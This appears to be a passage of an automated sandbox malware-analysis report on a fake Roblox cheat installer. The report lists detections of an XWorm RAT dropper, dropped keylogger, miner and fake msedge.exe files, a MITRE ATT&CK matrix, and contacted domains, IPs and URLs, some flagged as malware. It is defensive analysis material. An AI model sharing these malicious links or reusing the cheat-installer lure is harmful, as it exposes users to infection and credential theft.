            Source: Yara matchFile source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 816, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts1
            Native API            		1
            Scripting            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            Input Capture            		1
            System Time Discovery            		Remote Services12
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory2
            File and Directory Discovery            		Remote Desktop Protocol1
            Input Capture            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection            		1
            Obfuscated Files or Information            		Security Account Manager136
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook21
            Software Packing            		NTDS221
            Security Software Discovery            		Distributed Component Object ModelInput Capture5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp            		LSA Secrets1
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Masquerading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1484380 Sample: roblox cheat.exe Startdate: 30/07/2024 Architecture: WINDOWS Score: 90 52 titanium.roblox.com 2->52 54 edge-term4.roblox.com 2->54 56 5 other IPs or domains 2->56 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus detection for URL or domain 2->74 76 Antivirus detection for dropped file 2->76 78 9 other signatures 2->78 10 roblox cheat.exe 4 2->10         started        signatures3 process4 file5 34 C:\Users\user\...\robloxPX1instaler.exe, PE32 10->34 dropped 36 C:\...\cheatinstaler cheatinstalerF6R54T.exe, PE32+ 10->36 dropped 38 C:\Users\user\...\roblox cheat.exe.log, ASCII 10->38 dropped 13 cheatinstaler cheatinstalerF6R54T.exe 11 10->13         started        16 robloxPX1instaler.exe 12 10->16         started        process6 dnsIp7 40 C:\Users\user\AppData\Local\...\Keyloger.exe, PE32 13->40 dropped 42 C:\Users\user\AppData\...\BitCoin_miner.exe, PE32 13->42 dropped 44 C:\Users\user\AppData\Local\...\msedge.exe, PE32 13->44 dropped 20 cmd.exe 1 14 13->20         started        46 edge-term4-ams2.roblox.com 128.116.21.3, 443, 49701, 49741 ROBLOX-PRODUCTIONUS United States 16->46 48 d2v57ias1m20gl.cloudfront.net 18.239.18.53, 443, 49704, 49705 AMAZON-02US United States 16->48 50 127.0.0.1 unknown unknown 16->50 70 Tries to detect virtualization through RDTSC time measurements 16->70 file8 signatures9 process10 process11 22 chrome.exe 1 20->22         started        25 cmd.exe 1 20->25         started        27 conhost.exe 20->27         started        dnsIp12 58 192.168.2.5 unknown unknown 22->58 60 192.168.2.7, 123, 138, 443 unknown unknown 22->60 62 239.255.255.250 unknown Reserved 22->62 29 chrome.exe 22->29         started        32 conhost.exe 25->32         started        process13 dnsIp14 64 counter.yadro.ru 88.212.201.198, 443, 49718, 49725 UNITEDNETRU Russian Federation 29->64 66 88.212.201.204, 443, 49731 UNITEDNETRU Russian Federation 29->66 68 4 other IPs or domains 29->68

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            roblox cheat.exe61%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            roblox cheat.exe100%AviraTR/Dropper.Gen
            roblox cheat.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\ msedge.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\Keyloger.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ msedge.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Keyloger.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ msedge.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\Keyloger.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.firmaprofesional.com/cps00%URL Reputationsafe
            http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
            http://www.quovadisglobal.com/cps00%URL Reputationsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl00%URL Reputationsafe
            http://repository.swisssign.com/0%URL Reputationsafe
            http://www.accv.es/legislacion_c.htm0U0%URL Reputationsafe
            https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
            http://ocsp.accv.es00%URL Reputationsafe
            http://www.quovadisglobal.com/cps0%URL Reputationsafe
            http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt00%URL Reputationsafe
            http://crl.certigna.fr/certignarootca.crl010%URL Reputationsafe
            http://www.winimage.com/zLibDll0%URL Reputationsafe
            https://setup.rbxcdn.comw0%Avira URL Cloudsafe
            https://ecsv2.roblox.com/client/pbeesInSec0%Avira URL Cloudsafe
            http://www.winimage.com/zLibDll1.2.11rbr0%Avira URL Cloudsafe
            http://crl.securetrust.com/SGCA.crl0%Avira URL Cloudsafe
            https://iplogger.org/0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer0%Avira URL Cloudsafe
            http://www.accv.es000%URL Reputationsafe
            https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHun0%Avira URL Cloudsafe
            https://cdn.iplogger.org/redirect/handshake.png0%Avira URL Cloudsafe
            https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
            https://counter.yadro.ru/hit?0%Avira URL Cloudsafe
            http://tools.medialab.sciences-po.fr/iwanthue/index.php0%Avira URL Cloudsafe
            https://setup.rbxcdn.com0%Avira URL Cloudsafe
            https://client-telemetry.roblox.com90%Avira URL Cloudsafe
            https://client-telemetry.roblox.com0%Avira URL Cloudsafe
            https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.9031911781973960%Avira URL Cloudsafe
            https://2no.co/24RXx6H100%Avira URL Cloudmalware
            http://www.roblox.com/om0%Avira URL Cloudsafe
            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0%Avira URL Cloudsafe
            https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f832290%Avira URL Cloudsafe
            https://a.nel.cloudflare.com/report/v4?s=u4EPwlIfu5u%2FXXj0kRaPdkPJwH6VqTzmIykH2X9%2Fyuj1FCpzRnd4kOm6Jqn1GDDAN13dvkMlZJ9E0adkpSW7TqU2KldHQHU11YPPbJtFEHxZlyRQ0Vh6q2i%2Fu8W3Miwh0Hqm0%Avira URL Cloudsafe
            http://crl.dhimyotis.com/certignarootca.crl0%Avira URL Cloudsafe
            http://ocsp.accv.es0%Avira URL Cloudsafe
            https://client-telemetry.roblox.comA0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperD0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerLMEMH0%Avira URL Cloudsafe
            https://iplogger.org/privacy/0%Avira URL Cloudsafe
            http://crl.xrampsecurity.com/XGCA.crl0%Avira URL Cloudsafe
            http://www.roblox.com/0%Avira URL Cloudsafe
            https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchS0%Avira URL Cloudsafe
            http://www.roblox.com0%Avira URL Cloudsafe
            https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
            https://client-telemetry.roblox.cominatorey0%Avira URL Cloudsafe
            https://cdn.iplogger.org/favicon.ico0%Avira URL Cloudsafe
            https://cdn.iplogger.org/redirect/logo-dark.png0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrappere:0.0ms)0%Avira URL Cloudsafe
            https://client-telemetry.roblox.come0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64x0%Avira URL Cloudsafe
            https://counter.yadro.ru/hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.9031911781973960%Avira URL Cloudsafe
            https://wwww.certigna.fr/autorites/0%Avira URL Cloudsafe
            https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
            https://cdn.iplogger.org/redirect/brand.png0%Avira URL Cloudsafe
            https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/cert0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.0%Avira URL Cloudsafe
            http://www.accv.es/legislacion_c.htm0%Avira URL Cloudsafe
            http://crl.xrampsecurity.com/XGCA.crl00%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerons0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio640%Avira URL Cloudsafe
            https://iplogger.org/rules/0%Avira URL Cloudsafe
            http://bit.ly/1eMQ42U0%Avira URL Cloudsafe
            http://www.cert.fnmt.es/dpcs/0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerpany0%Avira URL Cloudsafe
            https://s3.amazonaws.com/0%Avira URL Cloudsafe
            https://2no.co/100%Avira URL Cloudmalware
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.h0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperate0%Avira URL Cloudsafe
            https://2no.co/redirect-2100%Avira URL Cloudmalware
            https://ecsv2.roblox.com/client/pbe0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            counter.yadro.ru
            		88.212.201.198
            		truefalse
              		unknown
              a.nel.cloudflare.com
              		35.190.80.1
              		truefalse
                		unknown
                edge-term4-ams2.roblox.com
                		128.116.21.3
                		truefalse
                  		unknown
                  2no.co
                  		172.67.149.76
                  		truefalse
                    		unknown
                    cdn.iplogger.org
                    		172.67.132.113
                    		truefalse
                      		unknown
                      www.google.com
                      		172.217.18.4
                      		truefalse
                        		unknown
                        d2v57ias1m20gl.cloudfront.net
                        		18.239.18.53
                        		truefalse
                          		unknown
                          ecsv2.roblox.com
                          		unknown
                          		unknownfalse
                            		unknown
                            client-telemetry.roblox.com
                            		unknown
                            		unknownfalse
                              		unknown
                              clientsettingscdn.roblox.com
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://cdn.iplogger.org/redirect/handshake.pngfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396false
                                • Avira URL Cloud: safe
                                		unknown
                                https://a.nel.cloudflare.com/report/v4?s=u4EPwlIfu5u%2FXXj0kRaPdkPJwH6VqTzmIykH2X9%2Fyuj1FCpzRnd4kOm6Jqn1GDDAN13dvkMlZJ9E0adkpSW7TqU2KldHQHU11YPPbJtFEHxZlyRQ0Vh6q2i%2Fu8W3Miwh0Hqmfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://2no.co/24RXx6false
                                  		unknown
                                  https://cdn.iplogger.org/favicon.icofalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://counter.yadro.ru/hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396false
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://setup.rbxcdn.comwrobloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.securetrust.com/SGCA.crlrobloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447552442.0000000001C26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.winimage.com/zLibDll1.2.11rbrroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.firmaprofesional.com/cps0robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445368599.0000000003FB3000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446558713.0000000003FB8000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449747424.0000000003FB9000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446944435.0000000003FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://iplogger.org/chromecache_64.20.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ecsv2.roblox.com/client/pbeesInSecrobloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerrobloxPX1instaler_DD2F4.log.2.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperrobloxPX1instaler_DD2F4.log.2.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.securetrust.com/SGCA.crl0robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447470573.0000000001C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://client-telemetry.roblox.comHttpPointsReporterUrlBootstrapperWebView2InstallationTelemetryHunroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.securetrust.com/STCA.crl0robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447973577.0000000001C2E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1453858015.0000000001C2F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448193902.0000000001C2F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447552442.0000000001C26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://curl.se/docs/hsts.htmlroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://tools.medialab.sciences-po.fr/iwanthue/index.phproblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://client-telemetry.roblox.comrobloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmp, roblox cheat.exe, robloxPX1instaler_DD2F4.log.2.dr, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://client-telemetry.roblox.com9robloxPX1instaler.exe, 00000002.00000003.1446077514.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446318793.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445368599.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449216456.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454531878.000000000400D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://counter.yadro.ru/hit?chromecache_64.20.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.quovadisglobal.com/cps0robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446970284.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447534893.0000000001C1B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlrobloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447470573.0000000001C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://2no.co/24RXx6Hcheatinstaler cheatinstalerF6R54T.exe, 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://setup.rbxcdn.comrobloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.roblox.com/omrobloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://iplogger.org/preview/7c00c9b3d049350da3aca75cf5f83229chromecache_64.20.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.dhimyotis.com/certignarootca.crlrobloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447390699.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447677703.0000000003F7F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447206724.0000000003F92000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448098395.0000000003F85000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ocsp.accv.esrobloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447120080.0000000001C35000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperDrobloxPX1instaler.exe, 00000002.00000003.1326917896.0000000004004000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://repository.swisssign.com/robloxPX1instaler.exe, 00000002.00000002.1453826248.0000000001C28000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446970284.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447973577.0000000001C2E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447534893.0000000001C1B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1453858015.0000000001C2F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448193902.0000000001C2F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447552442.0000000001C26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448775676.0000000001C1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://client-telemetry.roblox.comArobloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://iplogger.org/privacy/chromecache_64.20.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.roblox.com/robloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.xrampsecurity.com/XGCA.crlrobloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerLMEMHrobloxPX1instaler.exe, 00000002.00000002.1454531878.000000000400D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ecsv2.roblox.com/client/pbeTelemetryV2UrlRobloxTelemetrySendByBatchSizeRobloxTelemetryBatchSroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.roblox.comrobloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://curl.se/docs/http-cookies.htmlroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.accv.es/legislacion_c.htm0UrobloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
